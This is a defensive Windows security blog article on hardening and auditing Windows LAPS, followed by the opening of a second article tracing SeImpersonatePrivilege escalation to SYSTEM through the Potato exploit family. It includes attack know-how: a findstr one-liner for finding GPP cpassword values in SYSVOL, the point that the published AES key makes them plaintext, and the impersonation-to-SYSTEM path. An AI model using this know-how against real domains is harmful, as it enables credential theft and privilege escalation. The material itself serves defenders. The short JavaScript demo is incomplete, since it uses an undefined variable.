Tier-0 deviations from the tier-2 baseline are narrow but consequential. (a) `PasswordAgeDays` to 1 (AD) or 7 (Entra) caps the undetected-theft window. (b) `PostAuthenticationResetDelay` to 1 hour aggressively rotates after legitimate use. (c) `ADPasswordEncryptionPrincipal` to a dedicated decryptor group with PIM-gated activation [@ms-entra-pim] -- not standing membership. (d) `ADBackupDSRMPassword = True` only on DCs, so the Directory Services Restore Mode account is in LAPS scope. (e) `PasswordComplexity = 6` on accounts that a human must type under duress (DSRM, ESAE break-glass), `4` everywhere else. The tier-0 baseline is more expensive operationally -- daily rotation and 1-hour post-auth delay create a non-trivial volume of password reads through the decryption group -- and the cost is the entire point. Anything cheaper does not warrant the tier-0 label.

Note: The single most useful hardening move on a Windows LAPS deployment is to explicitly set ADPasswordEncryptionPrincipal to a dedicated group with minimum membership. Default = Domain Admins of the computer's domain is operationally correct (Domain Admins should be the readers of last resort) but architecturally lazy (most fleets do not want their DA group to be the routine LAPS-read group). Name the group something searchable -- LAPS-DPAPI-Decryptors is a defensible convention -- and put helpdesk LAPS-read permissions in that group, gated by Entra PIM activation [@ms-entra-pim] for non-emergency reads.

The audit-primitives sub-table

The decision of which tool answers which question is, in practice, the difference between a LAPS deployment that meets its goal and one that quietly does not. The five (and a half) primitives:

Primitive	Question it answers	Primary source
BloodHound `ReadLAPSPassword` edge	Which principals can read the LAPS password on which computer objects, transitively across the graph?	[@bloodhound-edge-readlaps]
PingCastle `A-LAPS-Not-Installed`	Does this domain have any LAPS solution installed for the native local administrator account?	[@pingcastle-rules]
PingCastle `A-LAPS-Joined-Computers`	Can a user who manually domain-joined a computer (via `mS-DS-CreatorSID` ownership) still read that computer's LAPS password?	[@pingcastle-rules]
PingCastle `A-PwdGPO`	Does this domain still have residual GPP `cpassword` artefacts in SYSVOL? (MITRE T1552.006)	[@pingcastle-rules; @mitre-t1552-006]
Windows event 4662 on `msLAPS-*` (SACL via `Set-LapsADAuditing`)	Who read which LAPS attribute on which computer object, and when?	[@ms-laps-set-adauditing; @ms-laps-ps-overview]
Entra audit log + Graph `GET /directory/deviceLocalCredentials/{deviceId}` reads	Who retrieved which LAPS password from Microsoft Entra ID (`BackupDirectory = 1`), and when?	[@ms-graph-localcredinfo; @ms-laps-entra-scenarios]

No Microsoft Defender for Identity alert in the current public taxonomy names LAPS specifically [@ms-defender-alerts]; instead, lean on the event 4662 SACL primitive plus advanced hunting in the IdentityDirectoryEvents table for principal-pattern anomalies. Microsoft's Compromised Credentials and Lateral Movement categories surface the downstream behaviour when a stolen LAPS password gets used.

{` // In production, run: Get-LapsADPassword -Identity * | Where-Object { // $.ExpirationTimestamp -lt (Get-Date) -or $.Source -eq 'Plaintext' // } // This in-browser demo mirrors the same logic against an array of mock computer objects.

const ONE_DAY_MS = 86400000; const computers = [ { name: "WS-001", msLapsExpiry: Date.now() + 5 * ONE_DAY_MS, encrypted: true }, { name: "WS-002", msLapsExpiry: Date.now() - 2 * ONE_DAY_MS, encrypted: true }, { name: "WS-003", msLapsExpiry: null, encrypted: false }, { name: "WS-004", msLapsExpiry: Date.now() + 1 * ONE_DAY_MS, encrypted: false }, ];

console.log(gaps.length === 0 ? "All computers have current, encrypted LAPS passwords" : "Coverage gaps:\n " + gaps.join("\n ")); `}

The AdministratorAccountName decision deserves one paragraph of its own. On Server SKUs, the built-in Administrator (RID 500) is enabled by default, and leaving the policy empty manages it -- this is what most deployments want. On Client SKUs the built-in is disabled by default; many shops create a named admin account (a common convention is lapsadmin) and set AdministratorAccountName to that name. On Windows 11 24H2 and Windows Server 2025 and later, the better answer is Automatic Account Management: set AutomaticAccountManagementEnabled = 1, AutomaticAccountManagementRandomizeName = 1, and AutomaticAccountManagementEnableAccount = 0, and the host will auto-create a randomised-name disabled-by-default local-admin account that Windows LAPS owns end to end [@ms-laps-account-modes]. The result is that an attacker enumerating local accounts cannot guess the LAPS-managed account name from RID 500, RID 1000, or any other predictable identifier.

This is the baseline. But LAPS is not the only answer to "who knows the local admin password." For three classes of fleet, the right answer is something else.

8. When LAPS Is Not the Right Tool

Three classes of fleet should not -- or should not only -- run Windows LAPS. The first wants a workflow LAPS does not offer. The second wants no standing local admin at all. The third is orthogonal: it changes the in-session elevation surface without changing the recoverable break-glass.

Third-party Privileged Access Management (PAM) vaults. Delinea Secret Server [@delinea-secretserver], CyberArk Endpoint Privilege Manager [@cyberark-epm], and BeyondTrust Password Safe are the dominant 2026 commercial offerings in the category. The case for running a PAM vault alongside (or instead of) Windows LAPS is rarely about cryptography and almost always about workflow. PAM vaults bring multi-factor authentication on checkout, full session recording, dual-approval gates for high-risk accounts, and cross-OS scope (Windows, macOS, Linux, network gear, hypervisors) under one ACL model. The total cost of ownership is higher than LAPS; the security model, properly deployed, is comparable. Many shops run both: Windows LAPS for the workstation floor, PAM for tier-0 break-glass with session recording. The split is a workflow trade-off, not an architectural one.

Zero standing local admin plus Entra PIM JIT elevation. Tier-0 fleets that have reached the "no routine local admin" architectural state disable the built-in RID 500 entirely and gate every admin operation through just-in-time elevation. Microsoft Entra Privileged Identity Management [@ms-entra-pim] supports the eligibility / activation / approval workflow at scale: an operator is eligible for an admin role, activates it for a bounded duration with optional MFA and ticket reference, and an approver signs off on the activation if policy requires. Windows LAPS coexists in this model as the absolute-last-resort break-glass mechanism -- for the case where Entra itself is down, the network is partitioned, and a human has to walk to a console and type a password. The architectural alignment is with MITRE T1078.001 (Default Accounts) [@mitre-t1078-001]: if the default account is permanently disabled and only re-enabled under PIM workflow, the entire technique class is bounded by the PIM activation log.

Windows 11 25H2 Administrator Protection. Per-elevation transient admin sessions arrived as a Tech Community preview in late 2025 [@tc-admin-protection-win11]. The feature creates a temporary, isolated "shadow admin" identity for the duration of each elevation prompt, brokering UAC-class elevation through a per-elevation token that is destroyed when the elevated process exits. This is orthogonal to LAPS, not a replacement. Administrator Protection addresses in-session UAC elevation; Windows LAPS addresses the recoverable break-glass password for off-network and non-bootable recovery. The two systems answer different questions. Conflating them produces designs that drop LAPS in favour of Administrator Protection and then discover, six months later, that there is no recovery primitive for a laptop the user has dropped off the corporate network for a year.

Situation	Recommended method
On-premises AD-joined, no Entra ID	A -- in-box Windows LAPS with AD backup
Microsoft Entra hybrid-joined, on-prem AD authoritative	A -- Microsoft's current hybrid recommendation
Pure Entra-joined, no on-prem AD	B -- in-box Windows LAPS with Entra ID backup
Stuck on Windows Server 2016 (excluded from Windows LAPS)	C -- legacy MSI LAPS until OS migration completes
In active migration from legacy LAPS to Windows LAPS	C in side-by-side mode with different managed accounts
Non-Windows scope (Linux, macOS, network gear) needs unified vaulting	D -- third-party PAM vault, often alongside A/B
Regulated industry requiring session recording / MFA checkout	D alongside A/B
Tier-0 fleet with a zero-standing-credential goal and Entra ID P2	E -- PIM-gated JIT elevation layered on A or B
Windows 11 fleet wanting in-session credential-theft mitigation	F -- Administrator Protection alongside A/B (orthogonal)
BYOD, workgroup, or unmanaged endpoints	None of A through F -- enrollment is the answer, not LAPS

flowchart TD Start["Local-admin password problem for a fleet"] BYOD{"BYOD or unmanaged?"} EnrollFirst["Enrollment is the answer, not LAPS"] Join{"AD-joined / hybrid / Entra-joined?"} WS2016{"Stuck on WS2016 or in migration?"} Tier0{"Tier 0 with zero-standing-credential goal?"} CrossOS{"Non-Windows scope or checkout workflow needed?"} WinElev{"Win 11 25H2 in-session elevation hardening?"} MA["Method A: Windows LAPS, AD backup"] MB["Method B: Windows LAPS, Entra backup"] MC["Method C: legacy MSI LAPS"] MD["Method D: PAM vault, alongside A/B"] ME["Method E: PIM-gated JIT, layered on A/B"] MF["Method F: Administrator Protection (orthogonal)"] Start --> BYOD BYOD -- yes --> EnrollFirst BYOD -- no --> Join Join -- AD or hybrid --> MA Join -- pure Entra --> MB MA --> WS2016 MB --> WS2016 WS2016 -- yes --> MC WS2016 -- no --> Tier0 Tier0 -- yes --> ME Tier0 -- no --> CrossOS CrossOS -- yes --> MD CrossOS -- no --> WinElev WinElev -- yes --> MF The terminology is genuinely confusing. *Microsoft Entra hybrid joined* is a device join state: the workstation is joined to both an on-premises AD domain and Microsoft Entra ID, and both directories know about it. *Microsoft Entra hybrid runbook worker*, by contrast, is an Azure Automation primitive that runs Automation runbooks on a worker process inside an on-premises environment. They share a word and nothing else. Windows LAPS policy for hybrid-*joined* devices is a `BackupDirectory` choice (typically AD for on-prem-authoritative hybrid fleets, Entra for Entra-authoritative); Hybrid runbook workers are an Azure Automation concern and entirely outside the LAPS scope.

All five answers above -- methods A through F -- have a structural ceiling. There is one bound none of them can break.

9. What LAPS Structurally Cannot Solve

Every recoverable-secret system has a privileged reader. Whether you call it ADPasswordEncryptionPrincipal, a "CyberArk vault admin," or a "PIM eligible approver," somebody can break the glass -- which means somebody can compromise the glass. This is a lower bound, not an implementation defect.

The eleven-year arc converged on a tight bound. It did not abolish the underlying problem. Four structural limits are worth naming, because each maps onto a real residual attack surface in 2026 deployments.

Bound 1: at least one reader exists, by construction. Symbolically, $|\text{readers}| \geq 1$. CNG DPAPI's group-key-protector substitution does not eliminate the privileged class; it relocates the trust boundary. The boundary moves from "every principal with LDAP read on the attribute" (legacy LAPS) to "every principal in the configured ADPasswordEncryptionPrincipal group at decryption time" (Windows LAPS). The relocation tightens the bound by orders of magnitude in typical fleets -- a LAPS-DPAPI-Decryptors group with five members beats an "All Extended Rights on the helpdesk OU" delegation with five hundred -- but it does not move the bound to zero. The directory that stores the LAPS secret remains a tier-0 asset, and the decryptor group remains a tier-0 principal class.

Every recoverable secret has a privileged reader. The architectural game is to make the reader class small, audited, time-bounded, and reachable from the directory only through Kerberos. The game is not to make the reader class empty. That game has no winning move.

Bound 2: the out-of-protocol OPSEC tail. Once a plaintext password leaves the directory -- pasted into a helpdesk ticket, screenshotted into a Slack DM, stored in a shared KeePass database that the team forgot to rotate -- the protocol's rotation knob is the only remaining mitigation. PostAuthenticationActions only fires after the next managed-account interactive logon [@ms-laps-policy-settings]; pre-logon exposure is bounded only by PasswordAgeDays. A password screenshotted into a chat log at 10:14 AM and never used is the password on that endpoint for the remainder of the configured rotation window, regardless of whether anyone has noticed the leak. The protocol does not, and cannot, solve "the password is now in a chat log."

Bound 3: unmanaged and BYOD endpoints. A machine that is neither AD-joined nor Microsoft Intune-managed has no LAPS policy applied to it. Personal-device BYO MAM scope is outside the LAPS protection model entirely. The fix for these endpoints is enrollment, not LAPS. A non-trivial portion of the residual local-admin-password risk in 2026 is concentrated on the long tail of unmanaged endpoints that exist precisely because management was politically or contractually infeasible. The protocol does not solve this; governance solves this.

Bound 4: verification asymmetry. The directory's audit log says what it chose to log. An unprivileged observer cannot verify enforcement from outside the directory. This is the structural ceiling that motivates external audit primitives -- PingCastle [@pingcastle-rules], BloodHound [@bloodhound-edge-readlaps], Defender for Identity [@ms-defender-alerts] -- because they sit outside the directory's own self-report. The bound cannot be closed inside the protocol; only an out-of-band attestation primitive can certify enforcement to a party that does not trust the directory.

Key idea: Somebody has to break the glass. The decryptor group is the new tier-0 asset; LAPS bounds the problem, it does not abolish it. The eleven-year arc was a convergence on a tighter bound, not an arrival at a clean answer. The right framing for the 2026 baseline is "the residual attack surface is now the actual attack surface, rather than an artefact of incomplete shipping." That is real progress -- it just is not closure.

A structurally tighter design would have three properties: threshold cryptography so no single principal can decrypt (an $m$-of-$n$ Shamir secret-sharing scheme over the password protector, with $m \geq 2$ in tier-0 fleets); attestation-bound retrieval so the decryptor's device state is part of the decryption policy (Azure Managed HSM's secure-key-release policy grammar [@ms-mhsm-policy-grammar] is the closest shipping primitive that approaches this -- a key-release decision conditioned on attestation claims like `x-ms-attestation-type` or `tee:sevsnpvm`); and a ledger-of-reads so every retrieval is recorded on a tamper-evident substrate that the directory itself cannot rewrite (Azure Confidential Ledger [@ms-conf-ledger] is the closest shipping primitive on the Microsoft side). None of these three are wired into Windows LAPS in 2026. Each exists as an adjacent Microsoft product. The architectural integration -- a Windows LAPS that requires two `LAPS-DPAPI-Decryptors` members to co-sign a retrieval, attests the retrieving device's state at decryption time, and writes the retrieval event to an append-only ledger the directory cannot edit -- is engineering work that nobody has shipped.

Some of those structural bounds map onto open problems with no clean 2026 answer. We close on six of them.

10. Open Problems in 2026

Six open problems in local-admin password management for which no first-party Microsoft answer ships in 2026. Each is one paragraph, framed as "what is the question," "what has been tried," and "what is the current best partial result."

Open question	What has been tried	Current best partial result
Legacy SYSVOL `cpassword` cleanup at scale	MS14-025 (UI disable, no remediation); PingCastle scanning; community `Get-GPPDeployedPasswords`	Third-party scan-and-manual-delete; no first-party cmdlet ships in the OS
Cross-tenant / cross-directory LAPS coverage report	Microsoft Intune compliance reports; manual `Get-LapsADPassword` and `Get-LapsAADPassword` joins	DIY KQL across two directories; no unified portal report
Hybrid-joined `BackupDirectory` ambiguity	Microsoft Learn guidance ("AD for hybrid")	Most shops configure both and reconcile downstream
Win 11 25H2 Administrator Protection and LAPS interaction	Tech Community guidance; Microsoft Learn architectural notes	Operate them as orthogonal, with no architectural integration
LDAP channel binding / signing enforcement migration	Microsoft KB4520412 enforcement push 2020-2024; cross-platform tool updates	Some Linux pentest tooling still incomplete; `bloodyAD` / `lapsv2decrypt` lead the field [@kb4520412-canonical]
Retrieval-event audit gap (cross-directory)	Event 4662 SACL via `Set-LapsADAuditing`; Entra audit log; Defender for Identity hunting	DIY KQL unification across AD + Entra; no unified audit pane

1. Legacy SYSVOL cpassword cleanup at scale. MS14-025 disabled new authoring twelve years ago; it never deleted what it patched [@ms14-025-bulletin]. No first-party Find-GPPPassword or Remove-GPPPassword cmdlet ships in the OS in 2026. PingCastle's A-PwdGPO rule and Semperis Purple Knight's equivalent scanner fill the gap [@pingcastle-rules]. The 2026 answer is: scan with a third-party tool, rotate the discovered credentials in whatever account-management primitive owns them, then delete the XML. The open question is why Microsoft has not shipped this in the twelve years since the bulletin. The blast-radius argument from 2014 -- "we cannot risk auto-deleting policy XMLs from SYSVOL" -- is now strictly weaker than the cleanup-tail argument that the residual artefacts keep showing up on internal pentest reports a decade later.

2. Cross-tenant and cross-directory LAPS coverage view. No portal-level "every Entra-joined and every AD-joined device that does not have a current LAPS password" report exists. Microsoft Intune compliance reports help on the Intune-managed side; Get-LapsADPassword -Identity * covers the AD side; Get-LapsAADPassword covers the Entra side. There is no single pane that unifies them. The 2026 answer is custom KQL or PowerShell that joins the three result sets on a normalised device identifier. The bottleneck is identity: Intune device IDs, AD objectGuid values, and Entra deviceId values are three different surrogate keys, and a fleet's mapping table is its own engineering investment.

3. Hybrid-joined BackupDirectory ambiguity. Microsoft Learn's current guidance is that hybrid-joined devices should typically use BackupDirectory = 2 (AD) when on-premises AD is the canonical identity store, and may use BackupDirectory = 1 (Entra) when Intune is the primary policy-delivery mechanism [@ms-laps-entra-scenarios]. In practice, the documentation hedges, and many shops configure both directions (one via GPO, one via Intune CSP) and rely on the per-device evaluation order to pick one. The result is a coverage-verification problem: a device that is "configured for AD backup" by GPO and "configured for Entra backup" by CSP can end up with the password in either backend, and the source of truth depends on policy precedence rules most operators do not memorise.

4. Windows 11 25H2 Administrator Protection and LAPS interaction. Administrator Protection's per-elevation transient admin tokens and Windows LAPS's recoverable break-glass password are operationally adjacent but architecturally disjoint [@tc-admin-protection-win11]. The documentation covers each feature on its own; the interaction matrix -- "what does a LAPS-managed RID 500 look like under Administrator Protection on a Win 11 25H2 host" -- is not laid out in one place. Tier-0 architects who want both behaviours have to assemble the answer from two product pages.

5. LDAP channel binding and signing enforcement migration. Microsoft has been hardening LDAP channel binding through a multi-year 2020-2024 enforcement push tracked under KB4520412 [@kb4520412-canonical]. The original March 10, 2020 update introduced Channel Binding Token (CBT) signing events 3039, 3040, and 3041; the manual enablement step was removed on November 14, 2023 for Windows Server 2022 and on January 9, 2024 for Windows Server 2019, after which the hardening became the default posture; starting with Windows Server 2022 23H2, all new versions ship with the full set of changes in the KB applied [@kb4520412-canonical]. Tooling that does not speak LDAPS-with-channel-binding will break when enforcement reaches its terminal state. Modern attack-graph tooling -- bloodyAD [@bloodyad-repo] and the lapsv2decrypt reference implementation [@lapsv2decrypt-repo] -- has tracked the changes. Not every Linux pentest stack has. Practitioners building Linux-based LAPS retrieval pipelines should validate their stack against the channel-binding-required posture before the enforcement wave reaches them.

6. The retrieval-event audit gap (cross-directory). Active Directory does not natively log every read of msLAPS-EncryptedPassword; Set-LapsADAuditing installs a SACL that emits Directory Service event 4662 for configured attribute reads [@ms-laps-set-adauditing]. Microsoft Entra ID logs LAPS retrieval through its own audit log, surfaced via the Graph endpoint [@ms-graph-localcredinfo]. The two log streams have different schemas, different timestamp normalisations, and different principal identifiers. Cross-pane unification of "who read which LAPS password when" across both backends is a DIY engineering problem in 2026. Microsoft Defender for Identity surfaces some of the AD-side reads under the Compromised Credentials and Lateral Movement categories [@ms-defender-alerts] but does not name LAPS specifically in the public alert taxonomy.

The threshold-cryptography open problem (an $m$-of-$n$ Shamir scheme over the LAPS password protector, with $m \geq 2$ in tier-0 fleets) is theoretically closed by the 1979 Shamir secret-sharing construction. The deployment-side block is that no Microsoft-shipped primitive wires the construction to the LAPS rotation pipeline. Adjacent shipping primitives (Azure Managed HSM key-release [@ms-mhsm-policy-grammar], Azure Confidential Ledger [@ms-conf-ledger]) exist on the Azure side, but the integration with on-premises LAPS clients is not on any public roadmap. The companion posts on DPAPI internals (#20) and Defender for Identity (#87) cover adjacent territory but do not close this gap.

None of those six dissolves the architectural lesson the eleven-year arc taught: the right defaults take a decade to ship. Here is the practitioner field manual for the meantime.

11. Practitioner Field Manual and FAQ

What follows is a seven-step deployment list, three named sidebars that surface the most common misconceptions, and a seven-question FAQ. Lift the step list verbatim into your deployment runbook; the sidebars exist because the article would not be defensible without them.

The audit-and-migrate seven-step list

Audit SYSVOL for cpassword first. Run PingCastle's A-PwdGPO (MITRE T1552.006) [@pingcastle-rules; @mitre-t1552-006] before touching anything else. A Windows triage one-liner -- findstr /s /i cpassword \\domain\SYSVOL\*.xml -- will land on most environments in under a minute. Remediate the discovered XML files (rotate the underlying account passwords, then delete the XMLs) before deploying Windows LAPS so the attack surface and the defence are not co-evolving in the same window.
Extend the AD schema for Windows LAPS. Run Update-LapsADSchema once per forest from a Domain Admin context. The cmdlet is idempotent and coexists with the legacy ms-Mcs-AdmPwd attribute on the same Computer object [@ms-laps-mig-scenarios].
Delegate. Run Set-LapsADComputerSelfPermission on each target OU so that computer accounts can write their own msLAPS-* attributes. Audit existing "All Extended Rights" delegations with Find-LapsADExtendedRights and remove any that do not have an explicit operational justification [@ms-laps-ps-overview]. This is the legacy-LAPS lesson applied to the new attribute set.
Configure encryption-at-rest. Verify that the forest's Domain Functional Level is Windows Server 2016 or higher. Configure ADPasswordEncryptionEnabled = 1 explicitly even though the default is True -- the explicit configuration makes the choice visible in policy audits and forces the operator to verify the DFL prerequisite [@ms-laps-policy-settings]. Assign ADPasswordEncryptionPrincipal to a dedicated LAPS-DPAPI-Decryptors group, not Domain Admins [@ms-laps-concepts-overview].
Deploy policy. GPO for AD-joined, Intune CSP for Entra-joined and hybrid-joined [@ms-laps-csp]. Settings as per section 7's baseline table. Validate via Get-LapsADPassword -Identity <computer> against a representative sample of hosts after the first one-hour rotation timer has fired [@ms-laps-get-adpassword].
Migrate from legacy LAPS. Use the documented coexistence pattern: the legacy MSI's CSE keeps running against the built-in RID 500, the new in-box LAPS takes over against a named secondary local-admin account, then retire the legacy ms-Mcs-AdmPwd schema readers and uninstall the MSI once Windows LAPS coverage is verified [@ms-laps-mig-scenarios]. The legacy MSI's installation is blocked on Windows 11 23H2 and later [@ms-laps-msi-download].
Continuous audit. PingCastle for coverage rules (A-LAPS-Not-Installed, A-LAPS-Joined-Computers, and the GPP A-PwdGPO) [@pingcastle-rules]; BloodHound for the ReadLAPSPassword edge across the graph [@bloodhound-edge-readlaps]; Defender for Identity for downstream behaviour under Compromised Credentials and Lateral Movement [@ms-defender-alerts]; and a custom KQL on the Entra audit log for LapsPasswordRetrieved events. None of these is optional in a deployment that intends to detect compromise.

Sidebar A: MS16-072 is NOT the LAPS attribute-readability bulletin

A recurring misattribution credits MS16-072 / KB3163622 / CVE-2016-3223 (June 14, 2016) [@ms16-072-bulletin; @ms16-072-kb; @cve-2016-3223] with closing the legacy LAPS attribute-readability issue. It does not. MS16-072 is a Group Policy retrieval-context fix: it moved user-side GPO fetch into the computer's security context to defeat a man-in-the-middle class on policy traffic. The actual LAPS attribute-readability issue -- "All Extended Rights" delegations silently including CONTROL_ACCESS on the CONFIDENTIAL ms-Mcs-AdmPwd attribute -- has no Microsoft-assigned CVE or bulletin. The canonical write-up is Sean Metcalf's August 2016 ADSecurity piece [@adsec-laps-2016], and the operational primitive is SpecterOps's ReadLAPSPassword BloodHound edge [@bloodhound-edge-readlaps].

Sidebar B: "Hybrid joined" is not "Hybrid Worker"

Microsoft Entra hybrid joined devices are workstations joined to both an on-premises AD domain and Microsoft Entra ID. The LAPS conversation about hybrid joined is a BackupDirectory choice. Microsoft Entra hybrid runbook workers, on the other hand, are an Azure Automation primitive -- worker processes that execute Automation runbooks against on-premises resources. They share a word and nothing else. A LAPS policy targeted at "hybrid devices" means hybrid joined; it has nothing to do with hybrid runbook workers. The article's section 8 includes the same disambiguation because operators conflate them with surprising frequency.

Sidebar C: How GPP cpassword still gets found in 2026

MS14-025 disabled new authoring but did not delete the artefacts [@ms14-025-bulletin]. The artefacts persist because SYSVOL replication is conservative -- nothing in the forest's design deletes anything from SYSVOL just because the editor UI was hot-patched on the administrative workstation. A fresh PingCastle scan against a long-lived forest will routinely surface 2010-era Groups.xml files [@pingcastle-rules], and the third-party scanner cohort is the only practical defence. The one-shot remediation pattern is: find with A-PwdGPO, rotate the underlying password via the replacement tool (Windows LAPS for built-in local admin; a PAM vault for service accounts that were stored in GPP), then delete the Groups.xml and let SYSVOL replication propagate the deletion.

No. Administrator Protection addresses in-session UAC-class elevation by brokering each elevation through a per-elevation transient shadow-admin identity [@tc-admin-protection-win11]; it does not provide a recoverable break-glass password for an off-network or non-bootable endpoint. The two systems are orthogonal and Microsoft recommends running them together on Windows 11 25H2 fleets. Replacing LAPS with Administrator Protection produces designs that lose the recovery primitive for laptops that have wandered off the corporate network for a year. Defence in depth, plus a coverage-leak primitive. An LDAP reader who is not in `ADPasswordEncryptionPrincipal` gets only an opaque ciphertext blob [@ms-laps-concepts-overview] -- but the same reader can still enumerate which computer objects have a current `msLAPS-EncryptedPassword`, which gives them target-selection telemetry on managed-versus-unmanaged hosts. The canonical write-up of this class is Sean Metcalf's August 2016 ADSecurity piece on the legacy `ms-Mcs-AdmPwdExpirationTime` attribute [@adsec-laps-2016], and the architectural lesson carries forward to Windows LAPS unchanged. Yes, in seconds. The 32-byte AES-256-CBC key is published verbatim in `[MS-GPPREF]` section 2.2.1.1.4 of Microsoft's Open Specifications corpus [@ms-gppref-aes-key] and that publication is permanent under the Open Specifications Promise. Any residual `Groups.xml` (or five sibling carriers including the asymmetric `Printers.xml` [@rewtdance-gpp-2012]) in SYSVOL that contains a `cpassword` attribute is operationally plaintext. The 2026 answer is to find them with PingCastle's `A-PwdGPO` rule [@pingcastle-rules] and remediate -- not to expect the artefacts to expire on their own. No. The rotation cycle is the `PasswordAgeDays` interval (default 30 days, minimum 1 on AD backup, minimum 7 on Entra backup) [@ms-laps-policy-settings]. After authentication, `PostAuthenticationActions` (default `3` = reset + sign out) fires once the `PostAuthenticationResetDelay` window (default 24 hours) has elapsed. Value `11` (Windows 11 24H2 / Server 2025+) adds termination of remaining processes; it is *not* a forced shutdown without warning -- the standard two-minute warning still applies and SMB sessions are deleted. Yes. LAPS rotates the password on a disabled account; the account simply cannot be used to log on until it is enabled. The break-glass runbook is: enable the account, retrieve the LAPS password, perform the recovery, rotate immediately, re-disable. On Windows 11 24H2 and Windows Server 2025 and later, Microsoft's recommendation is to enable Automatic Account Management with a randomised name and `AutomaticAccountManagementEnableAccount = 0` so the managed account ships disabled-by-default with a non-predictable name [@ms-laps-account-modes]. The pattern defeats predictable-RID-500 enumeration entirely. Microsoft Entra ID. With `BackupDirectory = 1` [@ms-laps-policy-settings], the local LAPS component posts the rotated password to the `deviceLocalCredentials` resource on the Entra device object via Microsoft Graph [@ms-graph-localcredinfo]. Retrieval is via `Get-LapsAADPassword` (a wrapper around the Graph endpoint), the Microsoft Entra portal Devices blade, or a direct `GET /directory/deviceLocalCredentials/{deviceId}` call [@ms-laps-entra-scenarios]. Read permission requires the Cloud Device Administrator or Intune Service Administrator Entra role. No. `CanReadGMSAPassword` is the edge for **Group Managed Service Accounts** -- a different Active Directory feature with a different ACL on a different attribute (`msDS-GroupMSAMembership`). The correct LAPS edge is **`ReadLAPSPassword`**, introduced in BloodHound 2.0 on August 7, 2018 [@specterops-bh2], and the current edge documentation covers both the legacy `ms-Mcs-AdmPwd` and the modern `msLAPS-*` attribute paths [@bloodhound-edge-readlaps].

The companion posts in this series cover Pass-the-Hash itself (#76), DPAPI internals (#20), Microsoft Entra Privileged Identity Management (#90), Active Directory tiering (#72), Microsoft Defender for Identity (#87), and BloodHound (#77). Each of those is referenced in this article at the point where the topic would otherwise demand a digression; each has its own deep treatment elsewhere.

Twenty years. Eleven years of which separated Microsoft's December 2012 articulation of the architecture from the April 11, 2023 in-box default [@ms-pth-whitepaper; @tc-windows-laps-ga-2023]. Four residual attack surfaces -- delegated-decryptor compromise, the pre-rotation OPSEC tail, BYOD endpoints, and the multi-decade MS14-025 cleanup tail [@ms14-025-bulletin] -- still resist the architecture rather than fall to it. One through-line: this is what shipping the right default a decade late looks like. The right defaults are now in the box. The directory is still tier 0. Somebody still has to break the glass. The architectural game from here is not to invent a new generation; it is to make sure the one we finally have is actually deployed, audited, and clean.

A Mitigation That Became a Primitive: The Story of SeImpersonatePrivilege

noreply@paragmali.com (Parag Mali) — Tue, 02 Jun 2026 00:00:00 GMT

Any Windows process running as `IIS APPPOOL\...`, `MSSQLSERVER`, or any other LOCAL SERVICE or NETWORK SERVICE-derived account holds one privilege -- `SeImpersonatePrivilege` -- that is sufficient, given any token-source primitive, to become `NT AUTHORITY\SYSTEM`. The privilege was introduced in Windows Server 2003 as a *mitigation*, so that lower-privileged service accounts could keep impersonating their RPC clients after Microsoft moved services off `SYSTEM`. Eighteen years of named-exploit lineage -- Token Kidnapping (2008), HotPotato (2016), RottenPotato, JuicyPotato, PrintSpoofer, GodPotato, LocalPotato, SilverPotato -- all ride on the same three-piece system: the privilege, the `ImpersonateNamedPipeClient` API, and Microsoft's documented decision to treat Windows Service Hardening as a *safety* boundary rather than a *security* boundary. This article explains why every closure path Microsoft has shipped narrows the surface without closing it, and why the primitive is structurally undefeated in 2026.

1. The One Line in `whoami /priv`

Open a shell inside any IIS application pool worker, any SQL Server service-step process, or any Exchange worker on a fully patched Windows 11 24H2 or Server 2025 box in 2026, and type whoami /priv. One line will read:

SeImpersonatePrivilege  Impersonate a client after authentication  Enabled

That single line is sufficient, given the right coercion primitive, to become NT AUTHORITY\SYSTEM in under a second. Microsoft has known this on the record since April 2009 [@msrc-blog-2009-04-token-kidnapping]. The privilege has not moved.

A Windows user right that lets a process call any of the kernel's token-substitution APIs on a token it has received from another principal. The right is enumerated as the constant `SE_IMPERSONATE_NAME` [@ms-learn-privilege-constants]. It is assigned by default to `LOCAL SERVICE`, `NETWORK SERVICE`, the local Administrators group, and every Windows service that runs under one of those accounts [@ms-learn-impersonate-policy]. Two well-known Windows accounts introduced in Windows Server 2003 / XP SP2 as a hardening alternative to running services under `NT AUTHORITY\SYSTEM`. The Microsoft Learn account documentation lists each account's default privilege set; in both cases `SE_IMPERSONATE_NAME` appears with the marker `(enabled)` [@ms-learn-localservice; @ms-learn-networkservice].

The Microsoft Learn pages list this assignment as a default. "Enabled" is a token-state distinction with operational weight. Most privileges in a service-account token are present but disabled: the process can call AdjustTokenPrivileges to turn them on, but until that happens the kernel treats the privilege as absent during access checks. SeImpersonatePrivilege on a NETWORK SERVICE token is shipped enabled. The process can call CreateProcessWithTokenW immediately, on first instruction.

Note: There is a real semantic difference between a privilege that is present-but-disabled and a privilege that is enabled. The kernel checks the enabled bit during access decisions. A NETWORK SERVICE process does not need to elevate the privilege before using it; the token already has it in the active state. This is the reason a freshly spawned IIS worker is one well-aimed coercion away from SYSTEM, with no preparatory steps.

Andrea Pierini, one of the most prolific researchers on this primitive, put the operational fact in eleven words: "if you have SeAssignPrimaryToken or SeImpersonate privilege, you are SYSTEM" [@labro-2020-printspoofer-post]. Clement Labro, quoting him, added the qualifier: "a deliberately provocative shortcut obviously, but it's not far from the truth." The aphorism gets repeated in every PrintSpoofer-era writeup for a reason.

Here is the article's load-bearing claim, stated up front and re-argued through every section that follows:

Microsoft gave every NETWORK SERVICE a privilege that, in the wrong hands, is equivalent to SYSTEM. They knew. They could not change it without breaking the service model. Roughly eighteen years after Cerrudo first put that fact on the record -- and ten years after HotPotato made it pushbutton -- they still have not.

The figure "roughly eighteen years" anchors to Cesar Cerrudo's March 2008 disclosure at Hack In The Box Dubai [@cerrudo-2008-pdf]. The privilege itself shipped earlier, in Server 2003 / XP SP2 (2003-2004), and the operational-pushbutton anchor is Stephen Breen's HotPotato (January 16, 2016) [@breen-2016-hot-potato]. Three different dates, three different anchors for "how long has this been true." The article uses the Cerrudo date because that is when the fact entered the offensive-research public record.

From here, this article traces the privilege from a 2003 backward-compatibility concession to a 2024 Troopers articulation by Pierini and Cocomazzi, and explains why every closure path Microsoft has shipped narrows the surface without closing it.

